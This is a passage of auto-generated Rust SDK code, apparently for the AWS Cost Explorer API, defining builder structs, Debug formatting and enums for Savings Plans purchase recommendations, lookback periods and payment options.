pub fn set_term_in_years(
mut self,
input: std::option::Option<crate::model::TermInYears>,
) -> Self {
self.term_in_years = input;
self
}
/// <p>The payment option used to generate the recommendation.</p>
pub fn payment_option(mut self, input: crate::model::PaymentOption) -> Self {
self.payment_option = Some(input);
self
}
pub fn set_payment_option(
mut self,
input: std::option::Option<crate::model::PaymentOption>,
) -> Self {
self.payment_option = input;
self
}
/// <p>The lookback period in days, used to generate the recommendation.</p>
pub fn lookback_period_in_days(
mut self,
input: crate::model::LookbackPeriodInDays,
) -> Self {
self.lookback_period_in_days = Some(input);
self
}
pub fn set_lookback_period_in_days(
mut self,
input: std::option::Option<crate::model::LookbackPeriodInDays>,
) -> Self {
self.lookback_period_in_days = input;
self
}
pub fn savings_plans_purchase_recommendation_details(
mut self,
input: impl Into<crate::model::SavingsPlansPurchaseRecommendationDetail>,
) -> Self {
let mut v = self
.savings_plans_purchase_recommendation_details
.unwrap_or_default();
v.push(input.into());
self.savings_plans_purchase_recommendation_details = Some(v);
self
}
pub fn set_savings_plans_purchase_recommendation_details(
mut self,
input: std::option::Option<
std::vec::Vec<crate::model::SavingsPlansPurchaseRecommendationDetail>,
>,
) -> Self {
self.savings_plans_purchase_recommendation_details = input;
self
}
/// <p>Summary metrics for your Savings Plans Recommendations. </p>
pub fn savings_plans_purchase_recommendation_summary(
mut self,
input: crate::model::SavingsPlansPurchaseRecommendationSummary,
) -> Self {
self.savings_plans_purchase_recommendation_summary = Some(input);
self
}
pub fn set_savings_plans_purchase_recommendation_summary(
mut self,
input: std::option::Option<crate::model::SavingsPlansPurchaseRecommendationSummary>,
) -> Self {
self.savings_plans_purchase_recommendation_summary = input;
self
}
/// Consumes the builder and constructs a [`SavingsPlansPurchaseRecommendation`](crate::model::SavingsPlansPurchaseRecommendation)
pub fn build(self) -> crate::model::SavingsPlansPurchaseRecommendation {
crate::model::SavingsPlansPurchaseRecommendation {
account_scope: self.account_scope,
savings_plans_type: self.savings_plans_type,
term_in_years: self.term_in_years,
payment_option: self.payment_option,
lookback_period_in_days: self.lookback_period_in_days,
savings_plans_purchase_recommendation_details: self
.savings_plans_purchase_recommendation_details,
savings_plans_purchase_recommendation_summary: self
.savings_plans_purchase_recommendation_summary,
}
}
}
}
impl SavingsPlansPurchaseRecommendation {
/// Creates a new builder-style object to manufacture [`SavingsPlansPurchaseRecommendation`](crate::model::SavingsPlansPurchaseRecommendation)
pub fn builder() -> crate::model::savings_plans_purchase_recommendation::Builder {
crate::model::savings_plans_purchase_recommendation::Builder::default()
}
}
/// <p>Summary metrics for your Savings Plans Purchase Recommendations.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansPurchaseRecommendationSummary {
/// <p>The estimated return on investment that's based on the recommended Savings Plans and
/// estimated savings.</p>
pub estimated_roi: std::option::Option<std::string::String>,
/// <p>The currency code that Amazon Web Services used to generate the recommendations and
/// present potential savings.</p>
pub currency_code: std::option::Option<std::string::String>,
/// <p>The estimated total cost of the usage after purchasing the recommended Savings Plans.
/// This is a sum of the cost of Savings Plans during this term, and the remaining On-Demand
/// usage.</p>
pub estimated_total_cost: std::option::Option<std::string::String>,
/// <p>The current total on demand spend of the applicable usage types over the lookback
/// period.</p>
pub current_on_demand_spend: std::option::Option<std::string::String>,
/// <p>The estimated total savings over the lookback period, based on the purchase of the
/// recommended Savings Plans.</p>
pub estimated_savings_amount: std::option::Option<std::string::String>,
/// <p>The aggregate number of Savings Plans recommendations that exist for your
/// account.</p>
pub total_recommendation_count: std::option::Option<std::string::String>,
/// <p>The recommended Savings Plans cost on a daily (24 hourly) basis.</p>
pub daily_commitment_to_purchase: std::option::Option<std::string::String>,
/// <p>The recommended hourly commitment that's based on the recommendation
/// parameters.</p>
pub hourly_commitment_to_purchase: std::option::Option<std::string::String>,
/// <p>The estimated savings relative to the total cost of On-Demand usage, over the lookback
/// period. This is calculated as <code>estimatedSavingsAmount</code>/
/// <code>CurrentOnDemandSpend</code>*100.</p>
pub estimated_savings_percentage: std::option::Option<std::string::String>,
/// <p>The estimated monthly savings amount that's based on the recommended Savings Plans
/// purchase.</p>
pub estimated_monthly_savings_amount: std::option::Option<std::string::String>,
/// <p> The estimated On-Demand costs you would expect with no additional commitment. It's
/// based on your usage of the selected time period and the Savings Plans you own. </p>
pub estimated_on_demand_cost_with_current_commitment: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for SavingsPlansPurchaseRecommendationSummary {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("SavingsPlansPurchaseRecommendationSummary");
formatter.field("estimated_roi", &self.estimated_roi);
formatter.field("currency_code", &self.currency_code);
formatter.field("estimated_total_cost", &self.estimated_total_cost);
formatter.field("current_on_demand_spend", &self.current_on_demand_spend);
formatter.field("estimated_savings_amount", &self.estimated_savings_amount);
formatter.field(
"total_recommendation_count",
&self.total_recommendation_count,
);
formatter.field(
"daily_commitment_to_purchase",
&self.daily_commitment_to_purchase,
);
formatter.field(
"hourly_commitment_to_purchase",
&self.hourly_commitment_to_purchase,
);
formatter.field(
"estimated_savings_percentage",
&self.estimated_savings_percentage,
);
formatter.field(
"estimated_monthly_savings_amount",
&self.estimated_monthly_savings_amount,
);
formatter.field(
"estimated_on_demand_cost_with_current_commitment",
&self.estimated_on_demand_cost_with_current_commitment,
);
formatter.finish()
}
}
/// See [`SavingsPlansPurchaseRecommendationSummary`](crate::model::SavingsPlansPurchaseRecommendationSummary)
pub mod savings_plans_purchase_recommendation_summary {
/// A builder for [`SavingsPlansPurchaseRecommendationSummary`](crate::model::SavingsPlansPurchaseRecommendationSummary)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) estimated_roi: std::option::Option<std::string::String>,
pub(crate) currency_code: std::option::Option<std::string::String>,
pub(crate) estimated_total_cost: std::option::Option<std::string::String>,
pub(crate) current_on_demand_spend: std::option::Option<std::string::String>,
pub(crate) estimated_savings_amount: std::option::Option<std::string::String>,
pub(crate) total_recommendation_count: std::option::Option<std::string::String>,
pub(crate) daily_commitment_to_purchase: std::option::Option<std::string::String>,
pub(crate) hourly_commitment_to_purchase: std::option::Option<std::string::String>,
pub(crate) estimated_savings_percentage: std::option::Option<std::string::String>,
pub(crate) estimated_monthly_savings_amount: std::option::Option<std::string::String>,
pub(crate) estimated_on_demand_cost_with_current_commitment:
std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The estimated return on investment that's based on the recommended Savings Plans and
/// estimated savings.</p>
pub fn estimated_roi(mut self, input: impl Into<std::string::String>) -> Self {
self.estimated_roi = Some(input.into());
self
}
pub fn set_estimated_roi(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.estimated_roi = input;
self
}
/// <p>The currency code that Amazon Web Services used to generate the recommendations and
/// present potential savings.</p>
pub fn currency_code(mut self, input: impl Into<std::string::String>) -> Self {
self.currency_code = Some(input.into());
self
}
pub fn set_currency_code(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.currency_code = input;
self
}
/// <p>The estimated total cost of the usage after purchasing the recommended Savings Plans.
/// This is a sum of the cost of Savings Plans during this term, and the remaining On-Demand
/// usage.</p>
pub fn estimated_total_cost(mut self, input: impl Into<std::string::String>) -> Self {
self.estimated_total_cost = Some(input.into());
self
}
pub fn set_estimated_total_cost(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.estimated_total_cost = input;
self
}
/// <p>The current total on demand spend of the applicable usage types over the lookback
/// period.</p>
pub fn current_on_demand_spend(mut self, input: impl Into<std::string::String>) -> Self {
self.current_on_demand_spend = Some(input.into());
self
}
pub fn set_current_on_demand_spend(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.current_on_demand_spend = input;
self
}
/// <p>The estimated total savings over the lookback period, based on the purchase of the
/// recommended Savings Plans.</p>
pub fn estimated_savings_amount(mut self, input: impl Into<std::string::String>) -> Self {
self.estimated_savings_amount = Some(input.into());
self
}
pub fn set_estimated_savings_amount(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.estimated_savings_amount = input;
self
}
/// <p>The aggregate number of Savings Plans recommendations that exist for your
/// account.</p>
pub fn total_recommendation_count(mut self, input: impl Into<std::string::String>) -> Self {
self.total_recommendation_count = Some(input.into());
self
}
pub fn set_total_recommendation_count(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.total_recommendation_count = input;
self
}
/// <p>The recommended Savings Plans cost on a daily (24 hourly) basis.</p>
pub fn daily_commitment_to_purchase(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.daily_commitment_to_purchase = Some(input.into());
self
}
pub fn set_daily_commitment_to_purchase(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.daily_commitment_to_purchase = input;
self
}
/// <p>The recommended hourly commitment that's based on the recommendation
/// parameters.</p>
pub fn hourly_commitment_to_purchase(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.hourly_commitment_to_purchase = Some(input.into());
self
}
pub fn set_hourly_commitment_to_purchase(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.hourly_commitment_to_purchase = input;
self
}
/// <p>The estimated savings relative to the total cost of On-Demand usage, over the lookback
/// period. This is calculated as <code>estimatedSavingsAmount</code>/
/// <code>CurrentOnDemandSpend</code>*100.</p>
pub fn estimated_savings_percentage(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.estimated_savings_percentage = Some(input.into());
self
}
pub fn set_estimated_savings_percentage(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.estimated_savings_percentage = input;
self
}
/// <p>The estimated monthly savings amount that's based on the recommended Savings Plans
/// purchase.</p>
pub fn estimated_monthly_savings_amount(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.estimated_monthly_savings_amount = Some(input.into());
self
}
pub fn set_estimated_monthly_savings_amount(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.estimated_monthly_savings_amount = input;
self
}
/// <p> The estimated On-Demand costs you would expect with no additional commitment. It's
/// based on your usage of the selected time period and the Savings Plans you own. </p>
pub fn estimated_on_demand_cost_with_current_commitment(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.estimated_on_demand_cost_with_current_commitment = Some(input.into());
self
}
pub fn set_estimated_on_demand_cost_with_current_commitment(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.estimated_on_demand_cost_with_current_commitment = input;
self
}
/// Consumes the builder and constructs a [`SavingsPlansPurchaseRecommendationSummary`](crate::model::SavingsPlansPurchaseRecommendationSummary)
pub fn build(self) -> crate::model::SavingsPlansPurchaseRecommendationSummary {
crate::model::SavingsPlansPurchaseRecommendationSummary {
estimated_roi: self.estimated_roi,
currency_code: self.currency_code,
estimated_total_cost: self.estimated_total_cost,
current_on_demand_spend: self.current_on_demand_spend,
estimated_savings_amount: self.estimated_savings_amount,
total_recommendation_count: self.total_recommendation_count,
daily_commitment_to_purchase: self.daily_commitment_to_purchase,
hourly_commitment_to_purchase: self.hourly_commitment_to_purchase,
estimated_savings_percentage: self.estimated_savings_percentage,
estimated_monthly_savings_amount: self.estimated_monthly_savings_amount,
estimated_on_demand_cost_with_current_commitment: self
.estimated_on_demand_cost_with_current_commitment,
}
}
}
}
impl SavingsPlansPurchaseRecommendationSummary {
/// Creates a new builder-style object to manufacture [`SavingsPlansPurchaseRecommendationSummary`](crate::model::SavingsPlansPurchaseRecommendationSummary)
pub fn builder() -> crate::model::savings_plans_purchase_recommendation_summary::Builder {
crate::model::savings_plans_purchase_recommendation_summary::Builder::default()
}
}
/// <p>Details for your recommended Savings Plans.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansPurchaseRecommendationDetail {
/// <p>Details for your recommended Savings Plans.</p>
pub savings_plans_details: std::option::Option<crate::model::SavingsPlansDetails>,
/// <p>The <code>AccountID</code> the recommendation is generated for.</p>
pub account_id: std::option::Option<std::string::String>,
/// <p>The upfront cost of the recommended Savings Plans, based on the selected payment
/// option.</p>
pub upfront_cost: std::option::Option<std::string::String>,
/// <p>The estimated return on investment that's based on the recommended Savings Plans that
/// you purchased. This is calculated as <code>estimatedSavingsAmount</code>/
/// <code>estimatedSPCost</code>*100.</p>
pub estimated_roi: std::option::Option<std::string::String>,
/// <p>The currency code that Amazon Web Services used to generate the recommendations and
/// present potential savings.</p>
pub currency_code: std::option::Option<std::string::String>,
/// <p>The cost of the recommended Savings Plans over the length of the lookback
/// period.</p>
pub estimated_sp_cost: std::option::Option<std::string::String>,
/// <p>The remaining On-Demand cost estimated to not be covered by the recommended Savings
/// Plans, over the length of the lookback period.</p>
pub estimated_on_demand_cost: std::option::Option<std::string::String>,
/// <p> The estimated On-Demand costs you would expect with no additional commitment, based
/// on your usage of the selected time period and the Savings Plans you own. </p>
pub estimated_on_demand_cost_with_current_commitment: std::option::Option<std::string::String>,
/// <p>The estimated savings amount that's based on the recommended Savings Plans over the
/// length of the lookback period.</p>
pub estimated_savings_amount: std::option::Option<std::string::String>,
/// <p>The estimated savings percentage relative to the total cost of applicable On-Demand
/// usage over the lookback period.</p>
pub estimated_savings_percentage: std::option::Option<std::string::String>,
/// <p>The recommended hourly commitment level for the Savings Plans type and the
/// configuration that's based on the usage during the lookback period.</p>
pub hourly_commitment_to_purchase: std::option::Option<std::string::String>,
/// <p>The estimated utilization of the recommended Savings Plans.</p>
pub estimated_average_utilization: std::option::Option<std::string::String>,
/// <p>The estimated monthly savings amount based on the recommended Savings Plans.</p>
pub estimated_monthly_savings_amount: std::option::Option<std::string::String>,
/// <p>The lowest value of hourly On-Demand spend over the lookback period of the applicable
/// usage type.</p>
pub current_minimum_hourly_on_demand_spend: std::option::Option<std::string::String>,
/// <p>The highest value of hourly On-Demand spend over the lookback period of the applicable
/// usage type.</p>
pub current_maximum_hourly_on_demand_spend: std::option::Option<std::string::String>,
/// <p>The average value of hourly On-Demand spend over the lookback period of the applicable
/// usage type.</p>
pub current_average_hourly_on_demand_spend: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for SavingsPlansPurchaseRecommendationDetail {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("SavingsPlansPurchaseRecommendationDetail");
formatter.field("savings_plans_details", &self.savings_plans_details);
formatter.field("account_id", &self.account_id);
formatter.field("upfront_cost", &self.upfront_cost);
formatter.field("estimated_roi", &self.estimated_roi);
formatter.field("currency_code", &self.currency_code);
formatter.field("estimated_sp_cost", &self.estimated_sp_cost);
formatter.field("estimated_on_demand_cost", &self.estimated_on_demand_cost);
formatter.field(
"estimated_on_demand_cost_with_current_commitment",
&self.estimated_on_demand_cost_with_current_commitment,
);
formatter.field("estimated_savings_amount", &self.estimated_savings_amount);
formatter.field(
"estimated_savings_percentage",
&self.estimated_savings_percentage,
);
formatter.field(
"hourly_commitment_to_purchase",
&self.hourly_commitment_to_purchase,
);
formatter.field(
"estimated_average_utilization",
&self.estimated_average_utilization,
);
formatter.field(
"estimated_monthly_savings_amount",
&self.estimated_monthly_savings_amount,
);
formatter.field(
"current_minimum_hourly_on_demand_spend",
&self.current_minimum_hourly_on_demand_spend,
);
formatter.field(
"current_maximum_hourly_on_demand_spend",
&self.current_maximum_hourly_on_demand_spend,
);
formatter.field(
"current_average_hourly_on_demand_spend",
&self.current_average_hourly_on_demand_spend,
);
formatter.finish()
}
}
/// See [`SavingsPlansPurchaseRecommendationDetail`](crate::model::SavingsPlansPurchaseRecommendationDetail)
pub mod savings_plans_purchase_recommendation_detail {
/// A builder for [`SavingsPlansPurchaseRecommendationDetail`](crate::model::SavingsPlansPurchaseRecommendationDetail)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) savings_plans_details: std::option::Option<crate::model::SavingsPlansDetails>,
pub(crate) account_id: std::option::Option<std::string::String>,
pub(crate) upfront_cost: std::option::Option<std::string::String>,
pub(crate) estimated_roi: std::option::Option<std::string::String>,
pub(crate) currency_code: std::option::Option<std::string::String>,
pub(crate) estimated_sp_cost: std::option::Option<std::string::String>,
pub(crate) estimated_on_demand_cost: std::option::Option<std::string::String>,
pub(crate) estimated_on_demand_cost_with_current_commitment:
std::option::Option<std::string::String>,
pub(crate) estimated_savings_amount: std::option::Option<std::string::String>,
pub(crate) estimated_savings_percentage: std::option::Option<std::string::String>,
pub(crate) hourly_commitment_to_purchase: std::option::Option<std::string::String>,
pub(crate) estimated_average_utilization: std::option::Option<std::string::String>,
pub(crate) estimated_monthly_savings_amount: std::option::Option<std::string::String>,
pub(crate) current_minimum_hourly_on_demand_spend: std::option::Option<std::string::String>,
pub(crate) current_maximum_hourly_on_demand_spend: std::option::Option<std::string::String>,
pub(crate) current_average_hourly_on_demand_spend: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>Details for your recommended Savings Plans.</p>
pub fn savings_plans_details(mut self, input: crate::model::SavingsPlansDetails) -> Self {
self.savings_plans_details = Some(input);
self
}
pub fn set_savings_plans_details(
mut self,
input: std::option::Option<crate::model::SavingsPlansDetails>,
) -> Self {
self.savings_plans_details = input;
self
}
/// <p>The <code>AccountID</code> the recommendation is generated for.</p>
pub fn account_id(mut self, input: impl Into<std::string::String>) -> Self {
self.account_id = Some(input.into());
self
}
pub fn set_account_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.account_id = input;
self
}
/// <p>The upfront cost of the recommended Savings Plans, based on the selected payment
/// option.</p>
pub fn upfront_cost(mut self, input: impl Into<std::string::String>) -> Self {
self.upfront_cost = Some(input.into());
self
}
pub fn set_upfront_cost(mut self, input: std::option::Option<std::string::String>) -> Self {
self.upfront_cost = input;
self
}
/// <p>The estimated return on investment that's based on the recommended Savings Plans that
/// you purchased. This is calculated as <code>estimatedSavingsAmount</code>/
/// <code>estimatedSPCost</code>*100.</p>
pub fn estimated_roi(mut self, input: impl Into<std::string::String>) -> Self {
self.estimated_roi = Some(input.into());
self
}
pub fn set_estimated_roi(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.estimated_roi = input;
self
}
/// <p>The currency code that Amazon Web Services used to generate the recommendations and
/// present potential savings.</p>
pub fn currency_code(mut self, input: impl Into<std::string::String>) -> Self {
self.currency_code = Some(input.into());
self
}
pub fn set_currency_code(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.currency_code = input;
self
}
/// <p>The cost of the recommended Savings Plans over the length of the lookback
/// period.</p>
pub fn estimated_sp_cost(mut self, input: impl Into<std::string::String>) -> Self {
self.estimated_sp_cost = Some(input.into());
self
}
pub fn set_estimated_sp_cost(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.estimated_sp_cost = input;
self
}
/// <p>The remaining On-Demand cost estimated to not be covered by the recommended Savings
/// Plans, over the length of the lookback period.</p>
pub fn estimated_on_demand_cost(mut self, input: impl Into<std::string::String>) -> Self {
self.estimated_on_demand_cost = Some(input.into());
self
}
pub fn set_estimated_on_demand_cost(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.estimated_on_demand_cost = input;
self
}
/// <p> The estimated On-Demand costs you would expect with no additional commitment, based
/// on your usage of the selected time period and the Savings Plans you own. </p>
pub fn estimated_on_demand_cost_with_current_commitment(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.estimated_on_demand_cost_with_current_commitment = Some(input.into());
self
}
pub fn set_estimated_on_demand_cost_with_current_commitment(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.estimated_on_demand_cost_with_current_commitment = input;
self
}
/// <p>The estimated savings amount that's based on the recommended Savings Plans over the
/// length of the lookback period.</p>
pub fn estimated_savings_amount(mut self, input: impl Into<std::string::String>) -> Self {
self.estimated_savings_amount = Some(input.into());
self
}
pub fn set_estimated_savings_amount(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.estimated_savings_amount = input;
self
}
/// <p>The estimated savings percentage relative to the total cost of applicable On-Demand
/// usage over the lookback period.</p>
pub fn estimated_savings_percentage(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.estimated_savings_percentage = Some(input.into());
self
}
pub fn set_estimated_savings_percentage(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.estimated_savings_percentage = input;
self
}
/// <p>The recommended hourly commitment level for the Savings Plans type and the
/// configuration that's based on the usage during the lookback period.</p>
pub fn hourly_commitment_to_purchase(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.hourly_commitment_to_purchase = Some(input.into());
self
}
pub fn set_hourly_commitment_to_purchase(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.hourly_commitment_to_purchase = input;
self
}
/// <p>The estimated utilization of the recommended Savings Plans.</p>
pub fn estimated_average_utilization(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.estimated_average_utilization = Some(input.into());
self
}
pub fn set_estimated_average_utilization(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.estimated_average_utilization = input;
self
}
/// <p>The estimated monthly savings amount based on the recommended Savings Plans.</p>
pub fn estimated_monthly_savings_amount(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.estimated_monthly_savings_amount = Some(input.into());
self
}
pub fn set_estimated_monthly_savings_amount(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.estimated_monthly_savings_amount = input;
self
}
/// <p>The lowest value of hourly On-Demand spend over the lookback period of the applicable
/// usage type.</p>
pub fn current_minimum_hourly_on_demand_spend(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.current_minimum_hourly_on_demand_spend = Some(input.into());
self
}
pub fn set_current_minimum_hourly_on_demand_spend(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.current_minimum_hourly_on_demand_spend = input;
self
}
/// <p>The highest value of hourly On-Demand spend over the lookback period of the applicable
/// usage type.</p>
pub fn current_maximum_hourly_on_demand_spend(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.current_maximum_hourly_on_demand_spend = Some(input.into());
self
}
pub fn set_current_maximum_hourly_on_demand_spend(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.current_maximum_hourly_on_demand_spend = input;
self
}
/// <p>The average value of hourly On-Demand spend over the lookback period of the applicable
/// usage type.</p>
pub fn current_average_hourly_on_demand_spend(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.current_average_hourly_on_demand_spend = Some(input.into());
self
}
pub fn set_current_average_hourly_on_demand_spend(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.current_average_hourly_on_demand_spend = input;
self
}
/// Consumes the builder and constructs a [`SavingsPlansPurchaseRecommendationDetail`](crate::model::SavingsPlansPurchaseRecommendationDetail)
pub fn build(self) -> crate::model::SavingsPlansPurchaseRecommendationDetail {
crate::model::SavingsPlansPurchaseRecommendationDetail {
savings_plans_details: self.savings_plans_details,
account_id: self.account_id,
upfront_cost: self.upfront_cost,
estimated_roi: self.estimated_roi,
currency_code: self.currency_code,
estimated_sp_cost: self.estimated_sp_cost,
estimated_on_demand_cost: self.estimated_on_demand_cost,
estimated_on_demand_cost_with_current_commitment: self
.estimated_on_demand_cost_with_current_commitment,
estimated_savings_amount: self.estimated_savings_amount,
estimated_savings_percentage: self.estimated_savings_percentage,
hourly_commitment_to_purchase: self.hourly_commitment_to_purchase,
estimated_average_utilization: self.estimated_average_utilization,
estimated_monthly_savings_amount: self.estimated_monthly_savings_amount,
current_minimum_hourly_on_demand_spend: self.current_minimum_hourly_on_demand_spend,
current_maximum_hourly_on_demand_spend: self.current_maximum_hourly_on_demand_spend,
current_average_hourly_on_demand_spend: self.current_average_hourly_on_demand_spend,
}
}
}
}
impl SavingsPlansPurchaseRecommendationDetail {
/// Creates a new builder-style object to manufacture [`SavingsPlansPurchaseRecommendationDetail`](crate::model::SavingsPlansPurchaseRecommendationDetail)
pub fn builder() -> crate::model::savings_plans_purchase_recommendation_detail::Builder {
crate::model::savings_plans_purchase_recommendation_detail::Builder::default()
}
}
/// <p>The attribute details on a specific Savings Plan.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansDetails {
/// <p>A collection of Amazon Web Services resources in a geographic area. Each Amazon Web Services Region is isolated and independent of the other Regions.</p>
pub region: std::option::Option<std::string::String>,
/// <p>A group of instance types that Savings Plans applies to.</p>
pub instance_family: std::option::Option<std::string::String>,
/// <p>The unique ID that's used to distinguish Savings Plans from one another.</p>
pub offering_id: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for SavingsPlansDetails {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("SavingsPlansDetails");
formatter.field("region", &self.region);
formatter.field("instance_family", &self.instance_family);
formatter.field("offering_id", &self.offering_id);
formatter.finish()
}
}
/// See [`SavingsPlansDetails`](crate::model::SavingsPlansDetails)
pub mod savings_plans_details {
/// A builder for [`SavingsPlansDetails`](crate::model::SavingsPlansDetails)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) region: std::option::Option<std::string::String>,
pub(crate) instance_family: std::option::Option<std::string::String>,
pub(crate) offering_id: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>A collection of Amazon Web Services resources in a geographic area. Each Amazon Web Services Region is isolated and independent of the other Regions.</p>
pub fn region(mut self, input: impl Into<std::string::String>) -> Self {
self.region = Some(input.into());
self
}
pub fn set_region(mut self, input: std::option::Option<std::string::String>) -> Self {
self.region = input;
self
}
/// <p>A group of instance types that Savings Plans applies to.</p>
pub fn instance_family(mut self, input: impl Into<std::string::String>) -> Self {
self.instance_family = Some(input.into());
self
}
pub fn set_instance_family(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.instance_family = input;
self
}
/// <p>The unique ID that's used to distinguish Savings Plans from one another.</p>
pub fn offering_id(mut self, input: impl Into<std::string::String>) -> Self {
self.offering_id = Some(input.into());
self
}
pub fn set_offering_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.offering_id = input;
self
}
/// Consumes the builder and constructs a [`SavingsPlansDetails`](crate::model::SavingsPlansDetails)
pub fn build(self) -> crate::model::SavingsPlansDetails {
crate::model::SavingsPlansDetails {
region: self.region,
instance_family: self.instance_family,
offering_id: self.offering_id,
}
}
}
}
impl SavingsPlansDetails {
/// Creates a new builder-style object to manufacture [`SavingsPlansDetails`](crate::model::SavingsPlansDetails)
pub fn builder() -> crate::model::savings_plans_details::Builder {
crate::model::savings_plans_details::Builder::default()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum LookbackPeriodInDays {
SevenDays,
SixtyDays,
ThirtyDays,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for LookbackPeriodInDays {
fn from(s: &str) -> Self {
match s {
"SEVEN_DAYS" => LookbackPeriodInDays::SevenDays,
"SIXTY_DAYS" => LookbackPeriodInDays::SixtyDays,
"THIRTY_DAYS" => LookbackPeriodInDays::ThirtyDays,
other => LookbackPeriodInDays::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for LookbackPeriodInDays {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(LookbackPeriodInDays::from(s))
}
}
impl LookbackPeriodInDays {
pub fn as_str(&self) -> &str {
match self {
LookbackPeriodInDays::SevenDays => "SEVEN_DAYS",
LookbackPeriodInDays::SixtyDays => "SIXTY_DAYS",
LookbackPeriodInDays::ThirtyDays => "THIRTY_DAYS",
LookbackPeriodInDays::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["SEVEN_DAYS", "SIXTY_DAYS", "THIRTY_DAYS"]
}
}
impl AsRef<str> for LookbackPeriodInDays {
fn as_ref(&self) -> &str {
self.as_str()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum PaymentOption {
AllUpfront,
HeavyUtilization,
LightUtilization,
MediumUtilization,
NoUpfront,
PartialUpfront,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for PaymentOption {
fn from(s: &str) -> Self {
match s {
"ALL_UPFRONT" => PaymentOption::AllUpfront,
"HEAVY_UTILIZATION" => PaymentOption::HeavyUtilization,
"LIGHT_UTILIZATION" => PaymentOption::LightUtilization,
"MEDIUM_UTILIZATION" => PaymentOption::MediumUtilization,
"NO_UPFRONT" => PaymentOption::NoUpfront,
"PARTIAL_UPFRONT" => PaymentOption::PartialUpfront,
other => PaymentOption::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for PaymentOption {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(PaymentOption::from(s))
}
}
impl PaymentOption {
pub fn as_str(&self) -> &str {
match self {
PaymentOption::AllUpfront => "ALL_UPFRONT",
PaymentOption::HeavyUtilization => "HEAVY_UTILIZATION",
PaymentOption::LightUtilization => "LIGHT_UTILIZATION",
PaymentOption::MediumUtilization => "MEDIUM_UTILIZATION",
PaymentOption::NoUpfront => "NO_UPFRONT",
PaymentOption::PartialUpfront => "PARTIAL_UPFRONT",
PaymentOption::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&[
"ALL_UPFRONT",
"HEAVY_UTILIZATION",
"LIGHT_UTILIZATION",
